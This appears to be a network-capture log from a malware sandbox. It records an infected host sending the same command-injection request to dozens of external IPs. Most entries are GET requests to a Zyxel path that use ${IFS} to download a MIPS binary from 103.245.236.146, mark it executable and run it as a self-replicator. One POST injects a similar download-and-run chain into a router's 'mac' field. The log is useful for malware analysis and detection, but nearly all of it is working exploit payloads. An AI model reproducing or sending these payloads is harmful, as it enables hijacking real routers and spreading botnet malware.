                                                        Jan 28, 2024 10:12:54.430313110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4936192.168.2.145249087.43.43.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430346966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4937192.168.2.145174061.7.5.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430397034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4938192.168.2.1445392120.199.143.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430449009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4939192.168.2.1456564102.217.11.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430474997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4940192.168.2.1441182155.222.176.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430532932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4941192.168.2.1456360176.77.13.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430567026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4942192.168.2.143372864.166.113.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430577993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4943192.168.2.144098882.241.27.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430629015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4944192.168.2.1460250218.233.21.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430666924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4945192.168.2.143668660.124.207.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430696011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4946192.168.2.1459686191.224.222.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430742025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4947192.168.2.1450300196.99.163.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430787086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4948192.168.2.143455453.194.203.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430818081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4949192.168.2.143319634.81.97.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430845022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4950192.168.2.144159294.75.113.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430892944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4951192.168.2.144445073.246.249.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430943966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4952192.168.2.145742071.110.63.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.430986881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4953192.168.2.144816027.192.156.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431022882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4954192.168.2.144952685.189.33.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431077003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4955192.168.2.1434204179.133.108.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431102991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4956192.168.2.1451260146.237.27.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431138039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4957192.168.2.1450726216.248.86.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431190968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4958192.168.2.1447160177.249.70.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431216955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4959192.168.2.1436630101.74.36.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431252003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4960192.168.2.1435968201.89.30.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431303024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4961192.168.2.1447644148.175.97.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.431329012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4962192.168.2.143791018.143.21.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435188055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4963192.168.2.1448204173.11.51.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435240984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4964192.168.2.14395505.175.160.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435297966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4965192.168.2.1440092200.252.15.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435332060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4966192.168.2.1442804149.105.162.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435358047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4967192.168.2.1446038154.242.92.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435395002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4968192.168.2.145431859.207.62.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435441017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4969192.168.2.145784694.255.63.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435477018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4970192.168.2.144180875.179.236.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435519934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4971192.168.2.1460442124.76.3.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435559034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4972192.168.2.1448906221.242.119.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435619116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4973192.168.2.1437310161.146.82.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435663939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4974192.168.2.1448576185.87.38.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435700893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4975192.168.2.144499436.142.223.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435748100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4976192.168.2.145753046.39.146.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435776949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4977192.168.2.145004618.197.188.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435826063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4978192.168.2.1438876123.91.131.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435887098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4979192.168.2.144189060.13.245.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435920000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4980192.168.2.1434106163.189.162.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.435956001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4981192.168.2.143748254.124.189.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.446086884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4982192.168.2.1432782209.24.131.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.446161032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4983192.168.2.145230898.166.231.538080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.311330080 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4984192.168.2.1438760113.207.219.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445409060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4985192.168.2.1460576184.222.200.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445539951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4986192.168.2.144813478.175.76.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445565939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4987192.168.2.1436246121.93.89.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445611000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4988192.168.2.1452182183.71.149.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445658922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4989192.168.2.14351062.36.11.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445717096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4990192.168.2.145587250.213.13.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445751905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4991192.168.2.143546686.235.198.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445786953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4992192.168.2.1460286150.156.228.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445847034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4993192.168.2.1444150176.57.66.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445877075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4994192.168.2.144484288.40.108.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:55.445924997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


